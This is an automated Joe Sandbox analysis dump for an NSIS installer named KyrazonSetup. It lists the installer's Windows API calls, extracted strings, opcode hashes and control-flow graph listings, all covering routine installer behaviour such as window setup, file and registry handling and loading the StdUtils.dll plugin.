                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: C:\
                                                                                      • API String ID: 2295610775-3404278061
                                                                                      • Opcode ID: ebfe8471de6f7f538a7bce34d1e55e3908f962607e92f8bf4160da5918238004
                                                                                      • Instruction ID: 41fb9a97abe6314a88c4d6bfa977ce05a31a72e52743b0bc12efeb1f41a56e63
                                                                                      • Opcode Fuzzy Hash: ebfe8471de6f7f538a7bce34d1e55e3908f962607e92f8bf4160da5918238004
                                                                                      • Instruction Fuzzy Hash: E9D012355290206BC21037386E0C84B7A589F153307128A7BF4A6F21E0CB348C66869C

                                                                                      Control-flow Graph (legend: Executed, Not Executed)
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                                                                                      • ShowWindow.USER32(?), ref: 00403BC4
                                                                                      • DestroyWindow.USER32 ref: 00403BD8
                                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403C15
                                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403C30
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403CDE
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403D02
                                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403E1A
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
                                                                                      • EnableWindow.USER32(?,?), ref: 00403E47
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403E64
                                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
                                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                                                                                      • lstrlenA.KERNEL32(0043C070,?,0043C070,00000000), ref: 00403EB9
                                                                                      • SetWindowTextA.USER32(?,0043C070), ref: 00403EC8
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3906175533-0
                                                                                      • Opcode ID: bb254eebcc43e1efea9e3628f986721872f6c569cd1eeb9010ff054dc953221e
                                                                                      • Instruction ID: 666c89c176ee591166c77646ceded32e7735a2126acae7f0578b7925c4b2ff01
                                                                                      • Opcode Fuzzy Hash: bb254eebcc43e1efea9e3628f986721872f6c569cd1eeb9010ff054dc953221e
                                                                                      • Instruction Fuzzy Hash: 6CC1A071504705EBEB216F62EE85E2B3A7CFB4674AF00053EF641B21E1CB7998419B2D

                                                                                      Control-flow Graph (legend: Executed, Not Executed)
                                                                                      APIs
                                                                                        • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                                                        • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                                                                      • lstrcatA.KERNEL32(00483000,0043C070,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C070,00000000,00000002,74DF3410,00485000,0047B000,00000000), ref: 00403849
                                                                                      • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,0047D000,00483000,0043C070,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C070,00000000,00000002,74DF3410), ref: 004038BE
                                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                                                                      • GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004038DC
                                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0047D000), ref: 00403925
                                                                                        • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                                                                                      • RegisterClassA.USER32(0044E3A0), ref: 00403962
                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,0044E3A0), ref: 00403A11
                                                                                      • GetClassInfoA.USER32(00000000,RichEdit,0044E3A0), ref: 00403A1E
                                                                                      • RegisterClassA.USER32(0044E3A0), ref: 00403A27
                                                                                      • DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb

                                                                                      Control-flow Graph (image not reproduced; legend: Executed / Not Executed)
                                                                                      APIs
                                                                                      • GetSystemDirectoryA.KERNEL32(Remove folder: ,00002000), ref: 004060ED
                                                                                      • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00002000,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,004050FF,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000), ref: 00406100
                                                                                      • SHGetSpecialFolderLocation.SHELL32(004050FF,74DF23A0,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,004050FF,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000), ref: 0040613C
                                                                                      • SHGetPathFromIDListA.SHELL32(74DF23A0,Remove folder: ), ref: 0040614A
                                                                                      • CoTaskMemFree.OLE32(74DF23A0), ref: 00406156
                                                                                      • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                                                                                      • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,004050FF,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00000000,00422028,74DF23A0), ref: 004061CC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                      • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                                                      Control-flow Graph (image not reproduced; legend: Executed / Not Executed)
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402D74
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00489000,00002000), ref: 00402D90
                                                                                        • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,00489000,80000000,00000003), ref: 00405B3D
                                                                                        • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0048B000,00000000,00481000,00481000,00489000,00489000,80000000,00000003), ref: 00402DDC
                                                                                      Strings
                                                                                      • Null, xrefs: 00402E5A
                                                                                      • Inst, xrefs: 00402E48
                                                                                      • Error launching installer, xrefs: 00402DB3
                                                                                      • soft, xrefs: 00402E51
                                                                                      • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft

                                                                                      Control-flow Graph (image not reproduced; legend: Executed / Not Executed)
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: ( B$( B$(A$(A$... %d%%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 623 401759-40177c call 402acb call 4059a5 628 401786-401798 call 405fa0 call 405938 lstrcatA 623->628 629 40177e-401784 call 405fa0 623->629 634 40179d-4017a3 call 40620a 628->634 629->634 639 4017a8-4017ac 634->639 640 4017ae-4017b8 call 4062a3 639->640 641 4017df-4017e2 639->641 648 4017ca-4017dc 640->648 649 4017ba-4017c8 CompareFileTime 640->649 643 4017e4-4017e5 call 405b14 641->643 644 4017ea-401806 call 405b39 641->644 643->644 651 401808-40180b 644->651 652 40187e-4018a7 call 4050c7 call 402f9c 644->652 648->641 649->648 654 401860-40186a call 4050c7 651->654 655 40180d-40184f call 405fa0 * 2 call 405fc2 call 405fa0 call 4056bc 651->655 666 4018a9-4018ad 652->666 667 4018af-4018bb SetFileTime 652->667 664 401873-401879 654->664 655->639 687 401855-401856 655->687 668 402960 664->668 666->667 670 4018c1-4018cc FindCloseChangeNotification 666->670 667->670 674 402962-402966 668->674 672 4018d2-4018d5 670->672 673 402957-40295a 670->673 676 4018d7-4018e8 call 405fc2 lstrcatA 672->676 677 4018ea-4018ed call 405fc2 672->677 673->668 681 4018f2-4022ec call 4056bc 676->681 677->681 681->673 681->674 687->664 689 401858-401859 687->689 689->654
                                                                                      APIs
                                                                                      • lstrcatA.KERNEL32(00000000,00000000,ExecShellAsUser,0047F000,00000000,00000000,00000031), ref: 00401798
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,ExecShellAsUser,ExecShellAsUser,00000000,00000000,ExecShellAsUser,0047F000,00000000,00000000,00000031), ref: 004017C2
                                                                                        • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00002000,004032DE,0044E400,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                                                                        • Part of subcall function 004050C7: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                                                        • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                                                        • Part of subcall function 004050C7: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,004030F7,004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0), ref: 00405123
                                                                                        • Part of subcall function 004050C7: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\), ref: 00405135
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp$C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\StdUtils.dll$ExecShellAsUser
                                                                                      • API String ID: 1941528284-3500068194
                                                                                      • Opcode ID: d1bc28a5a42b1dbe04e2539b2cb95902de82cba6976b7ef9835eae16b92b2e17
                                                                                      • Instruction ID: 96f3b1abcda028b22533463005ae4ed6ec9ac8348439948b24e876d516825338
                                                                                      • Opcode Fuzzy Hash: d1bc28a5a42b1dbe04e2539b2cb95902de82cba6976b7ef9835eae16b92b2e17
                                                                                      • Instruction Fuzzy Hash: 1141B671900615BACF107BA5CD45DAF3A79EF45369B60823FF421F20E2D77C8A418A6D

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 690 4062ca-4062ea GetSystemDirectoryA 691 4062ec 690->691 692 4062ee-4062f0 690->692 691->692 693 406300-406302 692->693 694 4062f2-4062fa 692->694 696 406303-406335 wsprintfA LoadLibraryExA 693->696 694->693 695 4062fc-4062fe 694->695 695->696
                                                                                      APIs
                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                                                                      • wsprintfA.USER32 ref: 0040631A
                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-4240819195
                                                                                      • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                      • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                                                                                      • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                      • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 697 401c0a-401c2a call 402aa9 * 2 702 401c36-401c3a 697->702 703 401c2c-401c33 call 402acb 697->703 705 401c46-401c4c 702->705 706 401c3c-401c43 call 402acb 702->706 703->702 709 401c9a-401cc0 call 402acb * 2 FindWindowExA 705->709 710 401c4e-401c6a call 402aa9 * 2 705->710 706->705 722 401cc6 709->722 720 401c8a-401c98 SendMessageA 710->720 721 401c6c-401c88 SendMessageTimeoutA 710->721 720->722 723 401cc9-401ccc 721->723 722->723 724 401cd2 723->724 725 402957-402966 723->725 724->725
                                                                                      APIs
                                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: b497a5e5830524a78c3b1dc5bcd9d1dec719188b70264decbce2c5befc7e4cb3
                                                                                      • Instruction ID: 2ba5304c1a7bae2d5eac8bf435d3177e819ffae85e7f6e151422e65e61bc6dac
                                                                                      • Opcode Fuzzy Hash: b497a5e5830524a78c3b1dc5bcd9d1dec719188b70264decbce2c5befc7e4cb3
                                                                                      • Instruction Fuzzy Hash: 92219171E44209BEEB15DFA5D986AAD7BB4EF84304F24843EF501B61D0CB7885408F28

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 728 4023d6-402407 call 402acb * 2 call 402b5b 735 402957-402966 728->735 736 40240d-402417 728->736 737 402427-40242a 736->737 738 402419-402426 call 402acb lstrlenA 736->738 740 40242c-40243d call 402aa9 737->740 741 40243e-402441 737->741 738->737 740->741 745 402452-402466 RegSetValueExA 741->745 746 402443-40244d call 402f9c 741->746 750 402468 745->750 751 40246b-402548 RegCloseKey 745->751 746->745 750->751 751->735 753 40271c-402723 751->753 753->735
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp,00000023,00000011,00000002), ref: 00402421
                                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp,00000000,00000011,00000002), ref: 0040245E
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp,00000000,00000011,00000002), ref: 00402542
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp
                                                                                      • API String ID: 2655323295-3732279548
                                                                                      • Opcode ID: 89191b3c74185597823c63b96631895be5d91288e44303a49c20697d39e5a080
                                                                                      • Instruction ID: 4c89e87aedaa5372dc267e27c604b307b221bfd6f664262a5d927997ae6a1bde
                                                                                      • Opcode Fuzzy Hash: 89191b3c74185597823c63b96631895be5d91288e44303a49c20697d39e5a080
                                                                                      • Instruction Fuzzy Hash: D011D371E00215BEEF00EFA5DE49AAEBA74EB44318F20843BF504F71D1C6B94D419B68

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 754 402003-40200f 755 402015-40202b call 402acb * 2 754->755 756 4020ca-4020cc 754->756 766 40203a-402048 LoadLibraryExA 755->766 767 40202d-402038 GetModuleHandleA 755->767 758 40223d-402242 call 401423 756->758 763 402957-402966 758->763 764 40271c-402723 758->764 764->763 769 40204a-402057 GetProcAddress 766->769 770 4020c3-4020c5 766->770 767->766 767->769 772 402096-40209b call 4050c7 769->772 773 402059-40205f 769->773 770->758 777 4020a0-4020a3 772->777 775 402061-40206d call 401423 773->775 776 402078-40208c 773->776 775->777 785 40206f-402076 775->785 779 402091-402094 776->779 777->763 780 4020a9-4020b1 call 40376e 777->780 779->777 780->763 786 4020b7-4020be FreeLibrary 780->786 785->777 786->763
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202E
                                                                                        • Part of subcall function 004050C7: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                                                        • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                                                        • Part of subcall function 004050C7: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,004030F7,004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0), ref: 00405123
                                                                                        • Part of subcall function 004050C7: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\), ref: 00405135
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                                                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 2987980305-0
                                                                                      • Opcode ID: 6af1e7eb7492141e71dde090e7896947b62a3459544a7b43b51ee23b6ebd047d
                                                                                      • Instruction ID: 925a26e0c59fcdbf3a92d1332ba84001e2e342ce267d8cdd70d9c1fb8e3a0ef4
                                                                                      • Opcode Fuzzy Hash: 6af1e7eb7492141e71dde090e7896947b62a3459544a7b43b51ee23b6ebd047d
                                                                                      • Instruction Fuzzy Hash: 0621C971A00215B7CF207FA48F4DBAE7A616B51359F20413BE611B21D0DBBD4942D66E

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 787 40558d-4055d8 CreateDirectoryA 788 4055da-4055dc 787->788 789 4055de-4055eb GetLastError 787->789 790 405605-405607 788->790 789->790 791 4055ed-405601 SetFileSecurityA 789->791 791->788 792 405603 GetLastError 791->792 792->790
                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNELBASE(?,?,00485000), ref: 004055D0
                                                                                      • GetLastError.KERNEL32 ref: 004055E4
                                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                                                                                      • GetLastError.KERNEL32 ref: 00405603
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 3449924974-0
                                                                                      • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                                      • Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
                                                                                      • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                                      • Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 793 405a26-405a41 call 405fa0 call 4059d1 798 405a43-405a45 793->798 799 405a47-405a54 call 40620a 793->799 800 405a99-405a9b 798->800 803 405a60-405a62 799->803 804 405a56-405a5a 799->804 806 405a78-405a81 lstrlenA 803->806 804->798 805 405a5c-405a5e 804->805 805->798 805->803 807 405a83-405a97 call 405938 GetFileAttributesA 806->807 808 405a64-405a6b call 4062a3 806->808 807->800 813 405a72-405a73 call 40597f 808->813 814 405a6d-405a70 808->814 813->806 814->798 814->813
                                                                                      APIs
                                                                                        • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00002000,004032DE,0044E400,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(?,?,C:\,?,00405A3D,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000,00000000), ref: 004059DF
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                                                                                      • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000,00000000), ref: 00405A79
                                                                                      • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000), ref: 00405A89
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3248276644-3404278061
                                                                                      • Opcode ID: 3b6d0c4ebac4798025594113f83dd9a311929e9887e3f7bb7884b5d6324322d4
                                                                                      • Instruction ID: d48a74c6cf84c1e4d32e0e1ba1c73eb4ee50dba0b310f8fa03ff64586fce4bcf
                                                                                      • Opcode Fuzzy Hash: 3b6d0c4ebac4798025594113f83dd9a311929e9887e3f7bb7884b5d6324322d4
                                                                                      • Instruction Fuzzy Hash: 04F04C26305E6556C722723A4C85A9F1A04CEC3324719073FF891F12D2DB3C8A439DBE
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405B7C
                                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: nsa
                                                                                      • API String ID: 1716503409-2209301699
                                                                                      • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                      • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                                                                                      • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                      • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58
                                                                                      APIs
                                                                                      • GlobalFree.KERNELBASE(02AD9E38), ref: 00401BD2
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00002004), ref: 00401BE4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree
                                                                                      • String ID: ExecShellAsUser
                                                                                      • API String ID: 3394109436-869331269
                                                                                      • Opcode ID: 909f4a83088a287ebc55af16c66f981feb6b1da81deccf2253087fc64da2977b
                                                                                      • Instruction ID: f6d7ead896680d37f92cdf99bd6625021356cee69a39ee0e8c8ac6ad6d468d56
                                                                                      • Opcode Fuzzy Hash: 909f4a83088a287ebc55af16c66f981feb6b1da81deccf2253087fc64da2977b
                                                                                      • Instruction Fuzzy Hash: 3E2108B27001429BDB10EB94DD88E9F73A8EB84318B10443BF151F72C0DB7CA8418B6D
                                                                                      APIs
